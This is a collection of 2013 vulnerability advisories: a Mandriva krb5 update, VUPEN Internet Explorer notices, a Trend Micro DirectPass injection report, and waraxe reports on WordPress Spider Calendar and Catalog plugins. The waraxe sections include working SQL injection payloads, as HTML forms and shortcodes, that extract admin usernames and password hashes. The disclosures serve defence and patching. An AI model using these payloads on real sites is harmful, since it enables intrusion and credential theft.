[ MDVSA-2013:166 ] krb5
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2013:166 http://www.mandriva.com/en/support/security/ ___ Package : krb5 Date: May 21, 2013 Affected: Business Server 1.0, Enterprise Server 5.0 ___ Problem Description: A vulnerability has been discovered and corrected in krb5: The kpasswd service provided by kadmind was vulnerable to a UDP ping-pong attack (CVE-2002-2443). The updated packages have been patched to correct this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2443 https://bugzilla.redhat.com/show_bug.cgi?id=962531 ___ Updated Packages: Mandriva Enterprise Server 5: 762c01ff4ce813cd3c5acce794c29aa3 mes5/i586/krb5-1.8.1-0.11mdvmes5.2.i586.rpm 415beef49e20f8b89c84b0270afbf1d6 mes5/i586/krb5-pkinit-openssl-1.8.1-0.11mdvmes5.2.i586.rpm a6bd6778ab49710b1a50633555b0dc27 mes5/i586/krb5-server-1.8.1-0.11mdvmes5.2.i586.rpm 497cfca620c25dd7ce523a61afdccc5e mes5/i586/krb5-server-ldap-1.8.1-0.11mdvmes5.2.i586.rpm 2fe4670b52795e8c74f53e7eee826c2c mes5/i586/krb5-workstation-1.8.1-0.11mdvmes5.2.i586.rpm 22926f634ea6ba5f816c14a2e30cc38a mes5/i586/libkrb53-1.8.1-0.11mdvmes5.2.i586.rpm 477f8f61cd9c8e577cd6797e850978ce mes5/i586/libkrb53-devel-1.8.1-0.11mdvmes5.2.i586.rpm 77c66246600b71f6471f75054e886cd4 mes5/SRPMS/krb5-1.8.1-0.11mdvmes5.2.src.rpm Mandriva Enterprise Server 5/X86_64: 1cab52ff4c719378b97ec3acbc7d911f mes5/x86_64/krb5-1.8.1-0.11mdvmes5.2.x86_64.rpm b5d51d32e5eaa96ab973e5ce151a5254 mes5/x86_64/krb5-pkinit-openssl-1.8.1-0.11mdvmes5.2.x86_64.rpm 6218fc79250aaec5c7ca19b193fdb8dc mes5/x86_64/krb5-server-1.8.1-0.11mdvmes5.2.x86_64.rpm 88de99aa8cde8adaee672c265292a355 mes5/x86_64/krb5-server-ldap-1.8.1-0.11mdvmes5.2.x86_64.rpm 39791a90573b4de08efdaf0193bbc5dc mes5/x86_64/krb5-workstation-1.8.1-0.11mdvmes5.2.x86_64.rpm 846b75578bb5559cfcf7aa2ce9e43156 mes5/x86_64/lib64krb53-1.8.1-0.11mdvmes5.2.x86_64.rpm 7351a8d2be13df25ab9c2534489a2da0 mes5/x86_64/lib64krb53-devel-1.8.1-0.11mdvmes5.2.x86_64.rpm 77c66246600b71f6471f75054e886cd4 mes5/SRPMS/krb5-1.8.1-0.11mdvmes5.2.src.rpm Mandriva Business Server 1/X86_64: 3150d604a21be2373d223457da156734 mbs1/x86_64/krb5-1.9.2-3.3.mbs1.x86_64.rpm 52729f0759e686cfdf5f9c99efc28862 mbs1/x86_64/krb5-pkinit-openssl-1.9.2-3.3.mbs1.x86_64.rpm 4b997282ad6dd76eb7a10f07809bef71 mbs1/x86_64/krb5-server-1.9.2-3.3.mbs1.x86_64.rpm b10b3c0211e071ab93e818db684098f9 mbs1/x86_64/krb5-server-ldap-1.9.2-3.3.mbs1.x86_64.rpm 417d23306554b1d7d290e8d3fed1a2d8 mbs1/x86_64/krb5-workstation-1.9.2-3.3.mbs1.x86_64.rpm a17c8e2438c0415c9ea478bcc0715101 mbs1/x86_64/lib64krb53-1.9.2-3.3.mbs1.x86_64.rpm 2d05c4ac4b44be10ea1e3d4337689512 mbs1/x86_64/lib64krb53-devel-1.9.2-3.3.mbs1.x86_64.rpm 95305e2323d63546e970538b7d692447 mbs1/SRPMS/krb5-1.9.2-3.3.mbs1.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/en/support/security/advisories/ If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.12 (GNU/Linux) iD8DBQFRm3ZlmqjQ0CJFipgRAmRWAJ42vFSB5f9jXtt3hRarBQpqxARd/ACfa9qv esFWMrXe/0P1/wv2ag87c6w= =Lg3K -END PGP SIGNATURE-
VUPEN Security Research - Microsoft Internet Explorer 10-9-8-7-6 VML Remote Integer Overflow (MS13-037 / Pwn2Own)
VUPEN Security Research - Microsoft Internet Explorer 10-9-8-7-6 VML Remote Integer Overflow (MS13-037 / Pwn2Own) Website : http://www.vupen.com Twitter : http://twitter.com/vupen I. BACKGROUND - Microsoft Internet Explorer is a web browser developed by Microsoft and included as part of the Microsoft Windows line of operating systems with more than 60% of the worldwide usage share of web browsers. (Wikipedia) II. DESCRIPTION - VUPEN Vulnerability Research Team discovered a critical vulnerability in Microsoft Internet Explorer. The vulnerability is caused by an integer overflow error in the vml.dll component when processing certain undocumented vector graphic properties, which could be exploited by remote attackers to leak arbitrary memory and compromise a vulnerable system via a malicious web page. CVE: CVE-2013-2551 III. AFFECTED PRODUCTS --- Microsoft Internet Explorer 10 Microsoft Internet Explorer 9 Microsoft Internet Explorer 8 Microsoft Internet Explorer 7 Microsoft Internet Explorer 6 Microsoft Windows RT Microsoft Windows 8 for 32-bit Systems Microsoft Windows 8 for x64-based Systems Microsoft Windows Server 2012 Microsoft Windows 7 for 32-bit Systems Microsoft Windows 7 for 32-bit Systems Service Pack 1 Microsoft Windows 7 for x64-based Systems Microsoft Windows 7 for x64-based Systems Service Pack 1 Microsoft Windows Server 2008 for 32-bit Systems Microsoft Windows Server 2008 for 32-bit Systems Service Pack 2 Microsoft Windows Server 2008 for x64-based Systems Microsoft Windows Server 2008 for x64-based Systems Service Pack 2 Microsoft Windows Server 2008 for Itanium-based Systems Microsoft Windows Server 2008 for Itanium-based Systems Service Pack 2 Microsoft Windows Server 2008 R2 for x64-based Systems Microsoft Windows Server 2008 R2 for x64-based Systems Service Pack 1 Microsoft Windows Server 2008 R2 for Itanium-based Systems Microsoft Windows Server 2008 R2 for Itanium-based Systems Service Pack 1 Microsoft Windows Vista Service Pack 1 Microsoft Windows Vista Service Pack 2 Microsoft Windows Vista x64 Edition Service Pack 1 Microsoft Windows Vista x64 Edition Service Pack 2 Microsoft Windows Server 2003 Service Pack 2 Microsoft Windows Server 2003 x64 Edition Service Pack 2 Microsoft Windows Server 2003 with SP2 for Itanium-based Systems Microsoft Windows XP Service Pack 3 Microsoft Windows XP Professional x64 Edition Service Pack 2 IV. Binary Analysis Exploits/PoCs --- In-depth technical analysis of the vulnerability and a fully functional remote code execution exploit will be available through the VUPEN BAE (Binary Analysis Exploits) portal: http://www.vupen.com/english/services/ba-index.php VUPEN Binary Analysis Exploits Service provides private exploits and in-depth technical analysis of the most significant public vulnerabilities based on disassembly, reverse engineering, protocol analysis, and code audit. The service allows governments and major corporations to evaluate risks, and protect infrastructures and assets against new threats. The service also allows security vendors (IPS, IDS, AntiVirus) to supplement their internal research efforts and quickly develop both vulnerability-based and exploit-based signatures to proactively protect their customers from attacks and emerging threats. V. VUPEN Threat Protection Program --- Governments and major corporations which are members of the VUPEN Threat Protection Program (TPP) have been proactively alerted about the vulnerability when it was discovered by VUPEN in advance of its public disclosure, and have received a detailed attack detection guidance to protect national and critical infrastructures against potential 0-day attacks exploiting this vulnerability: http://www.vupen.com/english/services/tpp-index.php VI. SOLUTION Apply MS13-037 security updates. VII. CREDIT -- This vulnerability was discovered by Nicolas Joly of VUPEN Security VIII. ABOUT VUPEN Security --- VUPEN is the leading provider of defensive and offensive cybersecurity intelligence and advanced vulnerability research. VUPEN solutions enable corporations and governments to manage risks, and protect critical networks and infrastructures against known and unknown vulnerabilities. VUPEN solutions include: * VUPEN Binary Analysis Exploits Service (BAE) : http://www.vupen.com/english/services/ba-index.php * VUPEN Threat Protection Program (TPP) : http://www.vupen.com/english/services/tpp-index.php IX. REFERENCES -- http://technet.microsoft.com/en-us/security/bulletin/ms13-037 http://www.vupen.com/english/research.php X. DISCLOSURE TIMELINE - 2011-11-09 - Vulnerability Discovered by VUPEN 2013-03-06 - Vulnerability Reported to Microsoft During Pwn2Own 2013 2013-05-20 - Public disclosure
VUPEN Security Research - Microsoft Internet Explorer 10-9 Object Confusion Sandbox Bypass (MS13-037 / Pwn2Own)
VUPEN Security Research - Microsoft Internet Explorer 10-9 Object Confusion Sandbox Bypass (MS13-037 / Pwn2Own) Website : http://www.vupen.com Twitter : http://twitter.com/vupen I. BACKGROUND - Microsoft Internet Explorer is a web browser developed by Microsoft and included as part of the Microsoft Windows line of operating systems with more than 60% of the worldwide usage share of web browsers. (Wikipedia) II. DESCRIPTION - VUPEN Vulnerability Research Team discovered a critical vulnerability in Microsoft Internet Explorer. The vulnerability is caused by an object confusion error in the IE broker process when processing unexpected variant objects, which could allow an attacker to execute arbitrary code within the context of the broker process to bypass Internet Explorer Protected Mode sandbox. III. AFFECTED PRODUCTS --- Microsoft Internet Explorer 10 Microsoft Internet Explorer 9 Microsoft Windows RT Microsoft Windows 8 for 32-bit Systems Microsoft Windows 8 for x64-based Systems Microsoft Windows Server 2012 Microsoft Windows 7 for 32-bit Systems Microsoft Windows 7 for 32-bit Systems Service Pack 1 Microsoft Windows 7 for x64-based Systems Microsoft Windows 7 for x64-based Systems Service Pack 1 Microsoft Windows Server 2008 for 32-bit Systems Microsoft Windows Server 2008 for 32-bit Systems Service Pack 2 Microsoft Windows Server 2008 for x64-based Systems Microsoft Windows Server 2008 for x64-based Systems Service Pack 2 Microsoft Windows Server 2008 for Itanium-based Systems Microsoft Windows Server 2008 for Itanium-based Systems Service Pack 2 Microsoft Windows Server 2008 R2 for x64-based Systems Microsoft Windows Server 2008 R2 for x64-based Systems Service Pack 1 Microsoft Windows Server 2008 R2 for Itanium-based Systems Microsoft Windows Server 2008 R2 for Itanium-based Systems Service Pack 1 Microsoft Windows Vista Service Pack 1 Microsoft Windows Vista Service Pack 2 Microsoft Windows Vista x64 Edition Service Pack 1 Microsoft Windows Vista x64 Edition Service Pack 2 IV. Binary Analysis Exploits/PoCs --- In-depth technical analysis of the vulnerability and a fully functional remote code execution exploit will be available through the VUPEN BAE (Binary Analysis Exploits) portal: http://www.vupen.com/english/services/ba-index.php VUPEN Binary Analysis Exploits Service provides private exploits and in-depth technical analysis of the most significant public vulnerabilities based on disassembly, reverse engineering, protocol analysis, and code audit. The service allows governments and major corporations to evaluate risks, and protect infrastructures and assets against new threats. The service also allows security vendors (IPS, IDS, AntiVirus) to supplement their internal research efforts and quickly develop both vulnerability-based and exploit-based signatures to proactively protect their customers from attacks and emerging threats. V. VUPEN Threat Protection Program --- Governments and major corporations which are members of the VUPEN Threat Protection Program (TPP) have been proactively alerted about the vulnerability when it was discovered by VUPEN in advance of its public disclosure, and have received a detailed attack detection guidance to protect national and critical infrastructures against potential 0-day attacks exploiting this vulnerability: http://www.vupen.com/english/services/tpp-index.php VI. SOLUTION Apply MS13-037 security updates. VII. CREDIT -- This vulnerability was discovered by Nicolas Joly of VUPEN Security VIII. ABOUT VUPEN Security --- VUPEN is the leading provider of defensive and offensive cybersecurity intelligence and advanced vulnerability research. VUPEN solutions enable corporations and governments to manage risks, and protect critical networks and infrastructures against known and unknown vulnerabilities. VUPEN solutions include: * VUPEN Binary Analysis Exploits Service (BAE) : http://www.vupen.com/english/services/ba-index.php * VUPEN Threat Protection Program (TPP) : http://www.vupen.com/english/services/tpp-index.php IX. REFERENCES -- http://technet.microsoft.com/en-us/security/bulletin/ms13-037 http://www.vupen.com/english/research.php X. DISCLOSURE TIMELINE - 2011-11-23 - Vulnerability Discovered by VUPEN 2013-03-06 - Vulnerability Reported to Microsoft During Pwn2Own 2013 2013-05-20 - Public disclosure
Trend Micro DirectPass 1.5.0.1060 - Multiple Vulnerabilities
Title: == Trend Micro DirectPass 1.5.0.1060 - Multiple Vulnerabilities Date: = 2013-05-21 References: === http://www.vulnerability-lab.com/get_content.php?id=894 Article: http://www.vulnerability-lab.com/dev/?p=580 Trend Micro (Reference): http://esupport.trendmicro.com/solution/en-US/1096805.aspx Trend Micro Solution ID: 1096805 Video: http://www.vulnerability-lab.com/get_content.php?id=951 VL-ID: = 894 Common Vulnerability Scoring System: 6.1 Introduction: = Trend Micro™ DirectPass™ manages website passwords and login IDs in one secure location, so you only need to remember one password. Other features include: Keystroke encryption, secure password generation, automatic form-filling, confidential notes, and a secure browser. Convenience - You can securely and easily manage passwords for numerous online accounts with just one password and automatically login to your websites with one click. More Security - You get an extra layer of online security with a specially designed browser for online banking and financial websites and protection from keylogging malware. No Hassles – You don’t have to be technical wizard to benefit from this password service, it’s simple to use. Confidence – You can have peace-of-mind using a password service provided by an Internet security provider with 20+ years of experience. All Your Devices – You can use DirectPass password manager on Windows PCs, Android mobile, Android Tablet, iPads and iPhones, and all devices are automatically encrypted and synchronized using the cloud (Copy of the Vendor Homepage: http://www.trendmicro.com/us/home/products/directpass/index.html ) Abstract: = The Vulnerability Laboratory Research Team discovered multiple software vulnerabilities in the official Trend Micro DirectPass v1.5.0.1060 Software. Report-Timeline: 2013-03-08: Researcher Notification Coordination (Benjamin Kunz Mejri) 2013-03-09: Vendor Notification (Trend Micro - Security Team) 2013-03-16: Vendor Response/Feedback (Trend Micro - Karen M.) 2013-05-09: Vendor Fix/Patch (Trend Micro - Active Update Server) 2013-05-15: Vendor Fix/Patch (Trend Micro - Solution ID Announcement) 2013-05-21: Public Disclosure (Vulnerability Laboratory) Status: Published Affected Products: == Trend Micro Product: DirectPass 1.5.0.1060 Exploitation-Technique: === Local Severity: = High Details: 1.1 A local command injection vulnerability is detected in the official Trend Micro DirectPass v1.5.0.1060 Software. The vulnerability allows local low privileged system user accounts to inject system specific commands or local path requests to compromise the software. The vulnerability is located in the direct-pass master password setup module of the Trend Micro InstallWorkspace.exe file. The master password module of the software allows users to review the included password in the secound step for security reason. The hidden protected master password will only be visible in the check module when the customer is processing to mouse-over onto the censored password field. When the software is processing to display the hidden password in plain the command/path injection will be executed out of the not parsed master password context in in the field listing. Exploitation of the vulnerability requires a low privilege system user account with direct-pass access and low or medium user interaction. Successful exploitation of the vulnerability results in software and system process compromise or execution of local system specific commands/path. Vulnerable File(s): [+] InstallWorkspace.exe Vulnerable Module(s): [+] Setup Master Password Vulnerable Parameter(s): [+] Master Password Affected Module(s): [+] Check Listing (Master Password) 1.2 A persistent input validation vulnerability is detected in the official Trend Micro DirectPass v1.5.0.1060 Software. The bug allows local attackers with low privileged system user account to implement/inject malicious script code on application side (persistent) of the software. The persistent web vulnerability is located in the direct-pass check module when processing to list a manipulated master password. In step one injects a malicious iframe in the hidden fields as master password. The inserted context will be saved and the execution will be in the next step when processing to list the master password context in the last check module. To bypass the validation the and execute the injected script code the attacker needs to split (%20) the input request. Exploitation of the vulnerability requires medium user interaction and a low privilege system user account with direct-pass. Successful exploitation
[waraxe-2013-SA#104] - Multiple Vulnerabilities in Spider Event Calendar Wordpress Plugin
[waraxe-2013-SA#104] - Multiple Vulnerabilities in Spider Event Calendar Wordpress Plugin === Author: Janek Vind waraxe Date: 22. May 2013 Location: Estonia, Tartu Web: http://www.waraxe.us/advisory-104.html Description of vulnerable software: ~~~ Spider Event Calendar is a highly configurable plugin which allows you to have multiple organized events in a calendar. This plugin is one of the best WordPress Calendar available in WordPress Directory. If you have problem with organizing your WordPress Calendar events and displaying them in a calendar format, then Spider WordPress Calendar Plugin is the best solution. http://wordpress.org/extend/plugins/spider-event-calendar/ http://web-dorado.com/products/wordpress-calendar.html Vulnerable is current version 1.3.0, older versions not tested. ### 1. Insufficient access check for AJAX operations in calendar.php ### Reason: 1. weak access control implementation Preconditions: 1. must be logged in as Wordpress user Impact: 1. Any Wordpress user can edit Spider Calendar Php script calendar.php line 197: [ source code start ]-- add_action('wp_ajax_spidercalendarinlineedit', 'spider_calendar_quick_edit'); add_action('wp_ajax_spidercalendarinlineupdate', 'spider_calendar_quick_update'); function spider_calendar_quick_update(){ global $wpdb; if(isset($_POST['calendar_id']) isset($_POST['calendar_title']) isset($_POST['us_12_format_sp_calendar'])){ $wpdb-update( .. function spider_calendar_quick_edit(){ global $wpdb; if(isset($_POST['calendar_id'])){ $row=$wpdb-get_row( [ source code end ] We can see, that AJAX actions wp_ajax_spidercalendarinlineedit and wp_ajax_spidercalendarinlineupdate are bound to functions spider_calendar_quick_edit and spider_calendar_quick_update. This two functions are meant to be used only by admin, but there is nothing to stop low privileged users. Even users with Subscriber access level can use those two AJAX functions. Test: htmlbodycenter form action=http://localhost/wp351/wp-admin/admin-ajax.php?action=spidercalendarinlineedit; method=post input type=hidden name=calendar_id value=1 input type=submit value=Test /form /center/body/html Result: calendar editing form will be shown Remark: This weakness in access control makes next two SQL injection vulnerabilities much more critical - there is no need for admin privileges, even low level Wordpress user is able to exploit these vulnerabilities. ### 2. SQL Injection in calendar.php function spider_calendar_quick_update ### Reason: 1. insufficient sanitization of user-supplied data Attack vector: 1. user-supplied POST parameter calendar_id Preconditions: 1. must be logged in as Wordpress user Php script calendar.php line 199: [ source code start ]-- add_action('wp_ajax_spidercalendarinlineupdate', 'spider_calendar_quick_update'); function spider_calendar_quick_update(){ global $wpdb; if(isset($_POST['calendar_id']) isset($_POST['calendar_title']) isset($_POST['us_12_format_sp_calendar'])){ .. $row=$wpdb-get_row(SELECT * FROM .$wpdb-prefix.spidercalendar_calendar WHERE id=.$_POST['calendar_id']); [ source code end ] As seen above, user-supplied POST parameter calendar_id is used in SQL query without any sanitization, resulting in SQL injection vulnerability. Test: htmlbodycenter form action=http://localhost/wp351/wp-admin/admin-ajax.php?action=spidercalendarinlineupdate; method=post input type=hidden name=calendar_title value=1 input type=hidden name=us_12_format_sp_calendar value=2 input type=hidden name=calendar_id value=0 UNION SELECT 1,(SELECT CONCAT_WS(0x3a,user_login,user_pass,user_email)FROM wp_users WHERE ID=1),3,4,5,6,7 input type=submit value=Test /form /center/body/html Result: in case of success it will be revealed sensitive information about Wordpress user with ID 1: username, password hash and email. ### 3. SQL Injection in calendar.php function spider_calendar_quick_edit ### Reason: 1. insufficient sanitization of user-supplied data Attack vector: 1.
[waraxe-2013-SA#105] - Multiple Vulnerabilities in Spider Catalog Wordpress Plugin
[waraxe-2013-SA#105] - Multiple Vulnerabilities in Spider Catalog Wordpress Plugin === Author: Janek Vind waraxe Date: 22. May 2013 Location: Estonia, Tartu Web: http://www.waraxe.us/advisory-105.html Description of vulnerable software: ~~~ Spider Catalog is the best WordPress catalog plugin. It is a convenient tool for organizing the products represented on your website into catalogs. Each product on the catalog is assigned with a relevant category, which makes it easier for the customers to search and identify the needed products within the catalog. http://wordpress.org/extend/plugins/catalog/ http://web-dorado.com/products/wordpress-catalog.html Vulnerable is current version 1.4.6, older versions not tested. ### 1. SQL Injection in Spider Catalog Shortcodes ### Reason: 1. insufficient sanitization of user-supplied data Attack vector: 1. user-supplied shortcode parameter id Preconditions: 1. must be logged in as user with posting privileges (Author level required as minimum by default) Php script catalog.php line 101: [ source code start ]-- add_shortcode('Spider_Catalog_Category', 'Spider_Catalog_Products_list_shotrcode'); function Spider_Catalog_Single_product_shotrcode($atts) { extract(shortcode_atts(array( 'id' = '', ), $atts)); return spider_cat_Single_product($id); } add_shortcode('Spider_Catalog_Product', 'Spider_Catalog_Single_product_shotrcode'); .. function spider_cat_Single_product($id) { .. returnfront_end_single_product($id); [ source code end ] We can see, that two shortcodes are defined: Spider_Catalog_Category and Spider_Catalog_Product. Both of them have SQL Injection vulnerability via shortcode parameter id. Let's analyze shortcode Spider_Catalog_Product implementation. Parameter id from shortcode Spider_Catalog_Product will be used in function front_end_single_product() as argument. Php script front_end_functions.php line 18: [ source code start ]-- function front_end_single_product($id) { .. $product_id=$id; .. $query = SELECT .$wpdb-prefix.spidercatalog_products.*, .$wpdb-prefix.spidercatalog_product_categories.name as cat_name FROM .$wpdb-prefix.spidercatalog_products left join .$wpdb-prefix.spidercatalog_product_categories on .$wpdb-prefix.spidercatalog_products.category_id= .$wpdb-prefix.spidercatalog_product_categories.id where .$wpdb-prefix.spidercatalog_products.id='.$product_id.' and .$wpdb-prefix.spidercatalog_products.published = '1' ; $rows = $wpdb-get_results($query); [ source code end ] As seen above, parameter id is used in SQL query without any sanitization, which leads to SQL Injection vulnerability. Tests: Log in as user with posting privileges and use shortcode as below: [Spider_Catalog_Product id=0' UNION SELECT 1,2,3,@@version,5,6,7,8,9,10,11,12#] Now open webpage containing specific post and MySQL version info will be revealed. Second test: [Spider_Catalog_Product id=0' UNION SELECT 1,2,3,(SELECT CONCAT_WS(0x3a,user_login,user_pass)FROM wp_users WHERE ID=1),5,6,7,8,9,10,11,12#] As result, sensitive information (username and hashed password) will be revealed for Wordpress user with ID 1 (usually admin). SQL Injection in other shortcode can be exploited in similar way: [Spider_Catalog_Category id=0 UNION SELECT 1,2,@@version,4,5,6,7,8#] .. and we can see MySQL version info (look at the html source code): a style=cursor:pointer; onclick=catt_idd_1(5.5.30) Back to Catalog ### 2. SQL Injection in catalog.php function catalog_after_search_results() ### Reason: 1. insufficient sanitization of user-supplied data Attack vector: 1. user-supplied parameter s Preconditions: none Php script catalog.php line 39: [ source code start ]-- function catalog_after_search_results($query){ global $wpdb; if(isset($_REQUEST['s']) $_REQUEST['s']){ $serch_word=htmlspecialchars(stripslashes($_REQUEST['s'])); $query=str_replace($wpdb-prefix.posts.post_content, gen_string_catalog_search($serch_word,$wpdb-prefix.'posts.post_content') . .$wpdb-prefix.posts.post_content,$query); } return $query; } add_filter( 'posts_request', 'catalog_after_search_results');